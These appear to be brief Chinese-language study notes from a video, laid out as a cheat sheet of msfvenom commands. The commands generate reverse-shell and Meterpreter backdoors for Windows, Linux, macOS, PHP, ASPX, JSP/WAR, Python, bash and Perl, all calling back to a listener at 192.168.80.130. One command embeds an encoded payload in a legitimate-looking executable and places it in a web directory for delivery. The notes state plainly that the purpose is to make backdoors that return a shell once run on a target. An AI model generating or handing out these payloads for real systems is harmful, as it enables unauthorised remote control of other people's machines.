来源于啊B的这个视频的学习笔记,但是讲的很乱
msfvenom是msfpayload和msfencode的组合,将这两个工具集成在一个框架实例中,就是msfvenom。
msfvenom是用来生成后门的软件,在目标机器上执行后门后,在本地监听就能上线shell。
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f exe > shell.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f macho > shell.macho
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -x /root/Desktop/StampRemover.exe x86/shikata_ga_nai -f exe -o /var/www/html/heellloo.exe
含义:msfvenom可以帮助我们从大量的metasploit有效负载中创建需要的负载,合并到利用程序中。这里使用的编码(-e x86/shikata_ga_nai)的payload ( windows/meterpreter/reverse_tcp),要回连的主机和端口( lhostlport )、模板文件(-x /root/Desktop/StampRemocer.exe )、都会整合到/var/www/html/heello.exe中。
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f raw > shell.php
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f aspx -o shell.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f war > shell.war
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.80.130 LPORT=5443 -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.80.130 LPORT=5443 -f raw > shell.pl
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c